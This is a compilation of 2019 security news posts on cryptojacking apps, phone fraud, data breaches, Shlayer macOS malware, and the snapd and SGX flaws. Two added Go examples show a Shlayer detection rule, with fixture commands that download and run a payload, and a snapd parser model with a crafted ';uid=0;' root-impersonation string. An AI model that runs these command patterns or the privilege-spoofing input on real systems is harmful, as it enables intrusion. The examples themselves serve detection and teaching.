Symantec discovered eight potentially unwanted applications (PUAs) in the Microsoft Store that were dropping cryptojacking Coinhive miners.

Security experts at Symantec have discovered eight potentially unwanted applications (PUAs) in the Microsoft Store that were dropping cryptojacking Coinhive miners.

The removed apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

The malicious Monero (XMR) Coinhive cryptomining scripts were delivered by leveraging Google’s legitimate Google Tag Manager (GTM) library.

The GTM tag management system allows developers to inject JavaScript and HTML content within their apps for tracking and analytics purposes.

“Users may get introduced to these apps through the top free apps lists on the Microsoft Store or through keyword search. The samples we found run on Windows 10, including Windows 10 S Mode.” reads the analysis published by Symantec.

“As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators.”

The malicious apps were added to the Microsoft Store between April and December 2018.

Unlike Google Play, the Microsoft Store doesn’t share information on the number of downloads or installs, but experts pointed out that the apps have a large number of fake ratings: almost 1,900 ratings were posted for these applications.

Once one of the apps is downloaded and launched, it fetches a cryptojacking JavaScript library by triggering Google Tag Manager (GTM) on their domain servers. The mining script is then activated and starts abusing the device’s resources to mine the Monero cryptocurrency.

After snooping on the network traffic between the apps and their command-and-control servers, Symantec was able to find out that they were using a variant of the JavaScript-based Coinhive miner script, a well-known tool used by threat actors as part of cryptojacking campaigns since September 2017 when it was launched.

The analysis of the network traffic associated with the apps allowed the researchers to find the hosting server for each app. All the servers have the same origin, so the apps were likely published by the same developers under different names.

Symantec provided the following recommendations to mitigate the threat:

  • Keep your software up to date.
  • Do not download apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by apps.
  • Pay close attention to CPU and memory usage of your computer or device.
  • Install a suitable security app, such as Norton or Symantec Endpoint Protection, to protect your device and data.
  • Make frequent backups of important data.

Pierluigi Paganini

(SecurityAffairs – cryptojacking Coinhive miners, malware)

The post Cryptojacking Coinhive Miners for the first time found on the Microsoft Store appeared first on Security Affairs.

Moscow police department operatives, with the participation of Group-IB experts, took down a group of phone scammers who for several years have been extorting money from the elderly.

Phone scammers typically managed to steal between 450 and 4500 USD per victim, promising substantial compensation for their purchases of medicines, medical devices or dietary supplements. According to the investigation, in just 7 episodes of fraud the damage is estimated at 150 000 USD, and the police believe that the number of victims is much higher.

At the end of 2018, employees of the Moscow Department of Internal Affairs came across the trail of a group of telephone scammers who had long been involved in fraud, extracting large sums of money from Russian elderly people. The money was used to purchase real estate, cars, collectors’ coins, jewellery and securities. According to the investigation, the scheme was invented and conducted by a 35-year-old resident of Domodedovo originally from the Republic of Azerbaijan. In addition to the leader, the group was made up of “callers” who communicated with pensioners over the phone, “cashiers” who controlled transactions, “money mules” who withdrew cash from ATMs, and even a dedicated person responsible for the relevance and security of the database of phone numbers of potential victims.

Where did the phone scammers get this data from? They profited from a scam, popular some time before, which sold “magic pills” — counterfeit drugs and dietary supplements purported to cure even serious chronic diseases. This scam’s elderly victims spent hundreds and thousands of dollars on the products, borrowing from friends and taking loans. The database of these names, phone numbers and the cost of the “drugs” ordered was in the hands of phone scammers. According to Group-IB experts, the list held the names of about 1,500 pensioners, their phone numbers, and the names and prices of the medicines they trustingly purchased. Judging by the database, these potential victims were between the ages of 70 and 84, and were from Moscow, Rostov, Tomsk, Nizhny Novgorod, Leningrad, Chelyabinsk, Orenburg and other regions. They had at different times bought expensive drugs, including: “Weian capsules” (2287 USD), “Flollrode aqueous” (1600 USD), “Miracle patches” (313 USD), applicators (170 USD), “Lun Jiang” (157 USD), and “Black nut” (388 USD).

For those who were suspicious of the compensation process, the “prosecutor of Moscow” offered to clarify the information from the “head of the financial department of a bank”. After that, the victim was contacted by another person — “a representative of a credit and financial organization” — who confirmed his willingness to transfer compensation to the pensioner’s account or to transfer the money in cash. When the victim agreed, “tax officers” entered into negotiations and reported that the victim needed to make an advance payment of 15% of the compensation as a tax. In addition, the scammers were able to collect an “insurance premium” or “lawyer’s tax”.

For example, one of the pensioners, who was promised a compensation of 8660 USD, was required to pay a tax of 747 USD. In another case, a request for compensation of 448 USD was made for the receipt of 4480 USD. One of the victims was a famous opera singer who paid the scammers about 4480 USD. The elderly people transferred the money to the cards of cashiers — “drops” or “money mules” — indicated by the attackers, who then withdrew the money from ATMs.

“Despite the fact that vishing (voice phishing) is a rather old type of phone fraud, it remains popular due to the fact that attackers come up with new methods of deception, targeted at the most vulnerable segments of the population — pensioners,” highlights Sergey Lupanin, Head of the Group-IB Investigation Department. “For years, deceived elderly people have repeatedly complained about telephone scams to the Russian Central Bank, the Ministry of Finance and the Prosecutor’s Office, and regulatory and law enforcement agencies have periodically issued warnings about these dangerous and very cynical fraudulent schemes, but the number of victims did not decrease. The scammers not only maintained secrecy but also improved their methods of social engineering: they quickly gained their victims’ trust, showed themselves to be intelligent and educated, and were persistent and aggressive. It’s rare for one of their victims to escape unscathed.”

However, as the result of a large-scale police operation, the organized criminal group was defeated: on 5 February, several detentions and searches were carried out at the criminals’ place of residence. A police search of the apartment of the scheme’s organizer turned up large sums of money in roubles and other currencies, bank cards, a traumatic gun, a hunting rifle and collectible coins. The scammer invested the money received in shares of Russian companies. In his stash inside a toilet, field investigators found database printouts with names of pensioners as well as extracts with phone numbers and names of victims that the criminal’s girlfriend had tried to flush. In a private house belonging to another detainee — the leader of the money mules — a police search turned up bank cards, databases of pensioners, accounting of criminal activity, money, and jewellery.

A total of seven people were detained. According to the investigation, the damages from 7 episodes of fraud are estimated at 150 000 USD, but operatives believe that the number of victims is much higher — at least 30 people. An investigation is underway.

About the author: Group-IB. Group-IB is one of the leading providers of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – phone scammers, cybercrime)

The post Group-IB helped to arrest phone scammers profiting off the backs of the Russian elderly appeared first on Security Affairs.

The week closes with the news of another embarrassing data breach: Coffee Meets Bagel confirmed a hack on Valentine’s Day.

The dating app Coffee Meets Bagel confirmed that hackers breached its systems on Valentine’s Day and may have obtained access to users’ account data.

The company notified account holders of the incident. The intrusion was discovered after an archive containing user data was offered for sale on the dark web for roughly $20,000 worth of Bitcoin.

Early this week, The Register exclusively revealed that some 617 million online account details stolen from 16 hacked websites are available for sale on the dark web. Coffee Meets Bagel learned of the incident on Feb. 11, 2019.

The advertisement for the sale of the huge trove of data was published on the popular Dream Market black marketplace; the data are available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites are known to have been hacked (e.g. MyHeritage, MyFitnessPal), for some of them, including Coffee Meets Bagel, it is the first time that the security community was informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legit. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

The Register report alleges that data belonging to 6.17 million Coffee Meets Bagel accounts (673 MB of data) were offered for sale. Data appears to be related to late 2017 and mid-2018.

“As always, we recommend you take extra caution against any unsolicited communications that ask you for your personal data or refer you to a web page asking for personal data,” reads the email sent by the company to the users. “We also recommend avoiding clicking on links or downloading attachments from suspicious emails.”

Stolen records include name, email address, age, registration date, and gender, but the data breach notification issued by Coffee Meets Bagel only reports that names and email addresses prior to May 2018 were exposed.

According to the company, no financial data were exposed because the company doesn’t store it.

Coffee Meets Bagel hired a forensic firm to investigate the incident and assess its systems; at the time of writing it is not clear how the hackers breached the company. It also started an audit of vendor and external systems.

Pierluigi Paganini

(SecurityAffairs – Coffee Meets Bagel, hacking)

The post Coffee Meets Bagel dating app confirms data breach appeared first on Security Affairs.

Germany announced it is going to make its cyber capabilities available for the NATO alliance to help fight hacking and electronic warfare.

Germany is going to share its cyber warfare capabilities with the NATO alliance to protect members of the alliance against hacking and electronic warfare.

During the 2016 Warsaw Summit, NATO officially recognised cyberspace as a military operational domain. This means that the NATO alliance will respond with conventional weapons in case of a severe cyber attack confirming that the Internet is a new battlefield.
Each Ally is committed to improving its resilience to cyber attacks and its ability to promptly respond to them, including in hybrid contexts. The Alliance aims to expand the scope of the NATO Cyber Range to help allies improve their cyber capabilities and information sharing on threats and best practices.

NATO fears both nation-state hacking and attacks carried out by cyber criminals; their activities are becoming ever more intense and demand a proper response from the alliance.

“NATO has designated cyberspace as a conflict domain alongside land, sea and air and says electronic attacks by the likes of Russia and China — but also criminals and so-called “hacktivists” — are becoming more frequent and more destructive.” reads a post published by AFP press.

During a meeting of defence ministers held in Brussels on Thursday, Germany told allies that it would make both its defensive and offensive cyber capabilities available.

“Just as we provide army, air force and naval forces to NATO, we are now also in a position to provide NATO capabilities on the issue of cyber within the national and legal framework that we have,” German Defence Minister Ursula von der Leyen said.

Germany is not alone: the US, Britain, Denmark, the Netherlands and Estonia have all announced the availability of their offensive cyber capabilities to the alliance.

NATO members hope that the announcement of the sharing of offensive capabilities will work as a deterrent for threat actors.

Members of the alliance, which already share conventional military means, aim to share their cyber capabilities for NATO missions and operations.

Potential targets of these operations can include any connected system, ranging from computers and mobile devices, to ICS systems in critical infrastructure.

“In a sign of the growing importance NATO countries attach to the cyber battlefield, this year Britain said it would spend 65 million pounds (74 million euros/$83 million) on offensive capabilities.” concludes AFP.

Pierluigi Paganini

(SecurityAffairs – NATO alliance, Germany)

The post Germany makes its cyber capabilities available for NATO alliance appeared first on Security Affairs.

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets macOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update and was distributed through a large number of websites, both fake sites and compromised legitimate domains.

“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation, and experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The script is base64-decoded and AES-decrypted, revealing a second script that contains another encoded script, which is subsequently executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script attempts to download the password-protected ZIP file using curl, and creates a directory in /tmp to store the ZIP file and unzip it. 

The script also makes the binary within the unzipped .app executable using chmod +x, then it runs the payload using specific arguments, and then performs a killall Terminal to kill the running script’s terminal window.

The second stage malware attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline.

“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

With this technique it is possible to run whitelisted software without user intervention even if the system is set to disallow unknown applications downloaded from the internet. 
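One way to turn the install chain described above into a detection, as an added example that is not from Carbon Black's analysis: the Go program below correlates process-execution events per session and alerts when several of the stages occur in order. The event format, stage names, threshold and sample command lines are constructed for illustration.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Event is one process-execution record. Session groups the events of one
// process tree. Both field names are assumptions made for this example.
type Event struct {
	Session string
	Cmd     string
}

// stage is one step of the install chain, listed in the article's order.
type stage struct {
	name  string
	match func(argv []string) bool
}

func prog(argv []string) string { return path.Base(argv[0]) }

// anyArg reports whether any argument after the program name satisfies ok.
func anyArg(argv []string, ok func(string) bool) bool {
	for _, a := range argv[1:] {
		if ok(a) {
			return true
		}
	}
	return false
}

func is(want string) func(string) bool { return func(a string) bool { return a == want } }

func inTmp(a string) bool {
	return strings.HasPrefix(a, "/tmp/") || strings.HasPrefix(a, "/private/tmp/")
}

var chain = []stage{
	{"curl-download", func(a []string) bool { return prog(a) == "curl" }},
	{"unzip-in-tmp", func(a []string) bool { return prog(a) == "unzip" && anyArg(a, inTmp) }},
	{"chmod-exec", func(a []string) bool { return prog(a) == "chmod" && anyArg(a, is("+x")) }},
	{"killall-terminal", func(a []string) bool { return prog(a) == "killall" && anyArg(a, is("Terminal")) }},
	{"authtrampoline", func(a []string) bool { return a[0] == "/usr/libexec/security_authtrampoline" }},
	{"spctl", func(a []string) bool { return prog(a) == "spctl" }},
}

// Detect walks events in arrival order and, per session, records the chain
// stages that occur in the article's order. Unrelated commands may sit in
// between and a stage may be missing from the telemetry. Sessions that reach
// at least `threshold` stages are returned with the stages they matched.
func Detect(events []Event, threshold int) map[string][]string {
	next := map[string]int{}
	seen := map[string][]string{}
	for _, ev := range events {
		argv := strings.Fields(ev.Cmd)
		if len(argv) == 0 {
			continue
		}
		for i := next[ev.Session]; i < len(chain); i++ {
			if chain[i].match(argv) {
				seen[ev.Session] = append(seen[ev.Session], chain[i].name)
				next[ev.Session] = i + 1
				break
			}
		}
	}
	alerts := map[string][]string{}
	for session, stages := range seen {
		if len(stages) >= threshold {
			alerts[session] = stages
		}
	}
	return alerts
}

// sampleEvents is constructed telemetry, not taken from a real host. Session
// s1 follows the chain in the article; s2 is an ordinary download-and-run.
func sampleEvents() []Event {
	return []Event{
		{"s1", "sh /Volumes/Player/.hidden/Player.command"},
		{"s1", "uuidgen"},
		{"s2", "curl -O https://example.invalid/tool.sh"},
		{"s1", "curl -o /tmp/AB12/stage2.zip http://example.invalid/stage2"},
		{"s1", "unzip -P PLACEHOLDER /tmp/AB12/stage2.zip -d /tmp/AB12"},
		{"s2", "chmod +x tool.sh"},
		{"s1", "chmod +x /tmp/AB12/Player.app/Contents/MacOS/Player"},
		{"s1", "killall Terminal"},
		{"s1", "/usr/libexec/security_authtrampoline ARGS_OMITTED"},
		{"s1", "spctl ARGS_OMITTED"},
	}
}

func main() {
	for session, stages := range Detect(sampleEvents(), 4) {
		fmt.Printf("ALERT session=%s stages=%s\n", session, strings.Join(stages, " > "))
	}
}
```

No single stage is suspicious on its own, which is why the rule scores the ordered combination rather than any one command.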

Carbon Black’s analysis includes Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Experts spotted a new strain of Shlayer macOS Malware appeared first on Security Affairs.

SAP released a collection of security fixes for February 2019 that address 13 vulnerabilities in its products, including a Hot News flaw in SAP HANA XSA.

This week SAP addressed 13 vulnerabilities in its products with the release of the February 2019 set of security fixes, including a Hot News flaw in SAP HANA Extended Application Services (XSA), advanced model.

SAP Security Patch Day for February 2019 includes 13 Security Notes and 3 updates to previously released security notes. 2 Notes are rated Hot News, 4 rated High priority, and 10 rated Medium priority.

“On 12th of February 2019, SAP Security Patch Day saw the release of 13 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

The fixes address flaws in the following SAP products: Business Client, HANA XSA, ABAP Platform (SLD Registration), Disclosure Management, Solution Tools Plug-In (ST-PI), Note Assistant, Business Objects, Manufacturing Integration and Intelligence, Business One Mobile Android App, and WebIntelligence BILaunchPad (Enterprise).

The most severe issue is a Hot News Note (CVSS score of 9.8) that updates a Security Note released on the April 2018 Patch Day and that includes security updates for the Chromium browser control delivered with SAP Business Client.

“As mentioned, one of the two SAP Security Notes tagged as HotNews (#2742027) affects SAP HANA XSA (the other one is #2622660 that is regularly updated with Chromium security updates and was explained in a previous blog post). It is a classic Missing Authorization Check that may allow an attacker not only to read/modify/delete sensitive information, but also to gain high-privileged functionalities.” reads the analysis published by Onapsis.

“It affects XS Advanced selected versions in both SAP HANA 1 and SAP HANA 2 and can be patched by upgrading the XS Advanced component.”

The security updates include a Hot News Note for HANA XSA that addresses a missing authentication check that could be exploited by an attacker to gain access to high-privileged functionalities, including the ability to read, modify, or delete sensitive information.

The security vulnerability affects XS Advanced selected versions in SAP HANA 1 and SAP HANA 2.

To address the flaw, customers should upgrade the XS Advanced component. SAP also provided a workaround that consists of disabling the component, if not in use. 

The SAP Security Patch Day for February 2019 also addressed another issue in SAP HANA XSA that could lead to information disclosure; it was rated Medium severity (CVSS score of 6.8).

SAP addressed several High priority Security Notes, including an XML External Entity (XXE) vulnerability in SLD Registration of ABAP Platform, a Missing Authorization check in Disclosure Management, and access to Easy Access Menu in ABAP Platform.

SAP also issued an update to a security note released on the November 2014 Patch Day, covering a potential information disclosure relating to the database server file system.

Below there is a summary, published by Onapsis, of the type of vulnerabilities that were addressed in February, including another six that were published in late January, after that month’s Security Notes Patch Day.

SAP HANA february

Pierluigi Paganini

(SecurityAffairs – SAP HANA, security)

The post SAP security fixes address Critical flaw in SAP HANA XSA appeared first on Security Affairs.

Bank of Valletta, the largest bank of Malta, was hit by a cyber attack in which attackers attempted to steal 13 million euros ($14.7 million).

Bank of Valletta, the largest bank in Malta, which accounts for almost half of banking transactions in the country, had to shut down its operations on Wednesday after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat: hackers broke into the systems of the bank and transferred the funds overseas.
Muscat told parliament that threat actors attempted to transfer funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

“The reason for my statement is to put people’s minds at rest that their money is safe in the bank,” Muscat insisted, adding that BOV was an important cog for the Maltese economy.

“It is no joke having a bank that controls half the economy shut down for a whole business day but at this stage caution trumped every other consideration.”

The Government of Malta is the largest shareholder of the Bank of Valletta. The financial institution shut down its systems, closed branches and ATMs, and suspended mobile and Internet banking and internal email.

After the disclosure of the attack, the website of the bank also went offline.

“Prime Minister Joseph Muscat told parliament the cyber attack involved the creation of false international payments totaling 13 million euros ($14.7 million) to banks in Britain, the United States, the Czech Republic and Hong Kong.” reported Reuters.

“The funds have been traced and the Bank of Valletta is seeking to have the fraudulent transactions reversed.”

The customer accounts were not affected and the services will be restored as soon as possible.

The authorities were able to trace the transactions and reverse them.

The Bank is working with local and international police authorities to investigate the case.

“During routine reconciliations that the Bank carries out regularly it was noticed that there were discrepancies in eleven payments having a total value of around EUR 13 million emanating from the Bank’s foreign payment accounts. The Bank took immediate steps to address this issue by requesting the international banks involved to stop these payments,” the bank said in a statement reported by MaltaToday.

Pierluigi Paganini

(SecurityAffairs – Bank of Valletta, hacking)

The post Bank of Valletta shut down its operations after a cyber attack appeared first on Security Affairs.

Experts at ACROS Security’s 0patch released an unofficial patch for a recently disclosed remote code execution vulnerability in the Apache OpenOffice suite.

ACROS Security’s 0patch released an unofficial patch for a path traversal flaw recently disclosed in the Apache OpenOffice suite.

The security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file with an embedded event.

“I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog.” reads the blog post published by Inführ.

The flaw could have a huge impact because the popular free, open source office suite is used by millions of Windows, MacOS and Linux users.

The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseover event to a link included in the ODT file.

Inführ devised an attack that relies on exploiting a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting the vulnerability it is possible to trigger the automatic execution of a specific Python library included in the suite using a hidden onmouseover event.

Even if OpenOffice developers still haven’t released a fix for the issue, 0patch experts have released an unofficial patch to address this flaw. The micropatch can be applied to the latest version of OpenOffice for Windows.

Researchers also released patches for LibreOffice.

0patch also published a video PoC that shows the exploitation of the vulnerability.

This is the second time in a few days that 0patch has released an unofficial patch: this week 0patch experts released a micropatch to address an Adobe Reader zero-day that allows malicious PDF documents to call home and send over the victim’s NTLM hash.

Pierluigi Paganini

(SecurityAffairs – micropatch, hacking)

The post 0patch released micropatch for code execution flaw in OpenOffice appeared first on Security Affairs.

An expert discovered a privilege escalation vulnerability in default installations of Ubuntu Linux that resides in the snapd API.

Security researcher Chris Moberly discovered a vulnerability in the REST API for Canonical’s snapd daemon that could allow attackers to gain root access on Linux machines.

Canonical, the makers of Ubuntu Linux, promotes their “Snap” packages to roll all application dependencies into a single binary (similar to Windows applications).

The Snap environment includes an “app store” where developers can contribute and maintain ready-to-go packages.

“Management of locally installed snaps and communication with this online store are partially handled by a systemd service called “snapd”.”

The flaw, called ‘Dirty_Sock’, affects several Linux servers; the expert successfully tested it on Ubuntu and released PoCs to show how to elevate privileges.

“In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.” wrote the expert.

“Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.”

“Both are effective on default installations of Ubuntu.”

Canonical has already addressed the flaw; administrators need to install the snapd update to prevent exploitation.

“Chris Moberly discovered that snapd versions 2.28 through 2.37 incorrectly validated and parsed the remote socket address when performing access controls on its UNIX socket.” reads the security advisory published by Canonical.

“A local attacker could use this to access privileged socket APIs and obtain administrator privileges. On Ubuntu systems with snaps installed, snapd typically will have already automatically refreshed itself to snapd 2.37.1 which is unaffected.”

Moberly discovered that the daemon leverages UNIX sockets to allow developers to communicate with it using a REST API.

This UNIX socket runs under the security context of the root user, so the expert investigated the possibility to elevate his privileges by abusing API methods.

The researcher discovered that it is possible to create a local user account using the daemon’s “POST /v2/create-user” API. This API command requires the program to have root permission to create a user.

The analysis of snapd connections allowed the expert to discover that, to decide whether a user has root permissions, snapd uses a string composed of the calling pid, the uid of the program connected to the socket, the socket path, and the RemoteAddr (i.e. “pid=5127;uid=1000;socket=/run/snapd.socket;@”).

The @ substring represents the RemoteAddr of the socket, that is, the socket name that is used to connect to the snapd socket.

Moberly created a socket containing ;uid=0; in its name to trick the parser into overwriting the uid when the string is analyzed.

Parsing a string that contains uid=0 in its last part overwrites the previous uid, tricking snapd into treating the caller as the root user and allowing a local user to be created.

The expert published the “dirty_sockv1” PoC code for this attack, but he pointed out that the attack required an Internet connection and the creation of an account on the Ubuntu SSO and uploading an SSH public key to your profile.

The expert also devised a Dirty_Sock version 2 that sideloads a malicious snap using the ‘POST /v2/snaps’ API instead.

“dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all.” continues the expert.

“HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service.”

The Dirty_Sock version 2 requires no Internet connection or SSH key.

Canonical fixed the issue with the release of version 2.37.1, which implements a stricter parser that removes the user-controlled variable.
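The parsing flaw and the stricter approach described above, modelled as an added Go example (not snapd's source code and not taken from the researcher's PoC). The function names, the `Peer` type and the sample socket name `/tmp/sock` are assumptions made for illustration; the strings are constructed from the format quoted in the article.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// nobody is the UID assumed when none can be established (never 0).
const nobody = ^uint32(0)

var errMalformed = errors.New("malformed peer credential string")

// Peer is the identity the daemon attributes to a connection.
type Peer struct {
	PID, UID uint32
	Socket   string
}

// field returns the value part of tok when tok has the form key=value.
func field(tok, key string) (string, bool) {
	if !strings.HasPrefix(tok, key+"=") {
		return "", false
	}
	return tok[len(key)+1:], true
}

// parseLoose models the flawed approach: the whole string is split on ';'
// and every "uid=" token assigns the UID, so the last one wins. The tail of
// the string is the peer's socket name, which the caller chooses.
func parseLoose(remoteAddr string) Peer {
	p := Peer{UID: nobody}
	for _, tok := range strings.Split(remoteAddr, ";") {
		if v, ok := field(tok, "pid"); ok {
			if n, err := strconv.ParseUint(v, 10, 32); err == nil {
				p.PID = uint32(n)
			}
		} else if v, ok := field(tok, "uid"); ok {
			if n, err := strconv.ParseUint(v, 10, 32); err == nil {
				p.UID = uint32(n)
			}
		} else if v, ok := field(tok, "socket"); ok {
			p.Socket = v
		}
	}
	return p
}

// parseStrict accepts only the daemon-written prefix "pid=N;uid=N;socket=PATH;"
// in that fixed order. Everything after the third ';' is the peer-chosen
// address and is never tokenised, so it cannot supply a second uid.
// Assumption: the daemon's own socket path contains no ';'.
func parseStrict(remoteAddr string) (Peer, error) {
	denied := Peer{UID: nobody}
	parts := strings.SplitN(remoteAddr, ";", 4)
	if len(parts) != 4 {
		return denied, errMalformed
	}
	pidStr, okPid := field(parts[0], "pid")
	uidStr, okUID := field(parts[1], "uid")
	sock, okSock := field(parts[2], "socket")
	if !okPid || !okUID || !okSock {
		return denied, errMalformed
	}
	pid, err := strconv.ParseUint(pidStr, 10, 32)
	if err != nil {
		return denied, errMalformed
	}
	uid, err := strconv.ParseUint(uidStr, 10, 32)
	if err != nil {
		return denied, errMalformed
	}
	return Peer{PID: uint32(pid), UID: uint32(uid), Socket: sock}, nil
}

// isRoot models the check that guards root-only API calls.
func isRoot(p Peer) bool { return p.UID == 0 }

// Constructed inputs: the string quoted in the article, and the same string
// with a peer socket name that contains ";uid=0;".
const (
	benignAddr  = "pid=5127;uid=1000;socket=/run/snapd.socket;@"
	craftedAddr = "pid=5127;uid=1000;socket=/run/snapd.socket;/tmp/sock;uid=0;"
)

func main() {
	for _, s := range []string{benignAddr, craftedAddr} {
		loose := parseLoose(s)
		strict, err := parseStrict(s)
		fmt.Printf("%q\n  loose:  uid=%d root=%v\n  strict: uid=%d root=%v err=%v\n",
			s, loose.UID, isRoot(loose), strict.UID, isRoot(strict), err)
	}
}
```

The general lesson for any daemon that authorises callers over a UNIX socket is to keep kernel-supplied credentials in a structure separate from anything the peer can name, rather than serialising both into one delimited string.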

Pierluigi Paganini

(SecurityAffairs – Snapd, Ubuntu)

The post Ubuntu snapd flaw allows getting root access to the system. appeared first on Security Affairs.

Researchers devised a new technique to hide malware in Intel SGX enclaves, making it impossible to detect by several security technologies.

Security researchers devised a new technique to hide malware in Intel SGX enclaves. Intel Software Guard eXtensions (SGX) is a technology for application developers that allows protecting select code and data from disclosure or modification. Intel SGX allows application code to execute within enclaves, which are protected areas of execution in memory.

The technique created by the experts allows them to deploy malicious code in a memory area that is protected by design, making detection hard.

Enclaves are designed to be protected from processes running at higher privilege levels, including the operating system, kernel, BIOS, SMM, hypervisor.

The team of researchers composed of Michael Schwarz, Samuel Weiser and Daniel Gruss of the Graz University of Technology in Austria, includes those that discovered the Spectre-Meltdown CPU vulnerabilities. They devised a method to bypass security protection and implant malware in the enclaves leveraging a benign application that uses a malicious enclave when executed.

Experts pointed out that the host application communicates with the enclave through an interface that should not allow the enclave to attack the app.

The researchers used Transactional Synchronization eXtensions (TSX), available in modern Intel CPUs, along with a fault-resistant read primitive technique called TSX-based Address Probing (TAP).

“Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer.” states the research paper published by the experts.

“We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

The experts developed a fault-resistant write primitive, Checking Located Addresses for Writability (CLAW) to determine whether it is possible to write in a memory page.

The primitive encapsulates the write instruction for the specific memory page within a TSX transaction and aborts the transaction just after the write operation.

The experts determine whether it is possible to write to a target memory page by analyzing the return value of the transaction.

Malware injected into the enclaves could be transparent to security solutions, including Address Space Layout Randomization (ASLR), stack canaries, and address sanitizer.

“The strong confidentiality and integrity guarantees of SGX fundamentally prohibit malware inspection and analysis, when running such malware within an enclave.” continues the analysis.

“Moreover, there’s a potential threat of next-generation ransomware which securely keeps encryption keys inside the enclave and, if implemented correctly, prevents ransomware recovery tools,” the academics explain.

The experts published a proof-of-concept exploit that bypassed ASLR, stack canaries, and address sanitizer; the overall exploit process took only 20.8 seconds. Hardware and software mitigations against this new attack will be implemented by Intel in future generations of CPUs.

“With SGX-ROP, we bypassed ASLR, stack canaries, and address sanitizer, to run ROP gadgets in the host context enabling practical enclave malware.” conclude the researchers.

“We conclude that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

Pierluigi Paganini

(SecurityAffairs – SGX enclaves, hacking)

The post Experts found a way to create a super-malware implanted in SGX-enclaves appeared first on Security Affairs.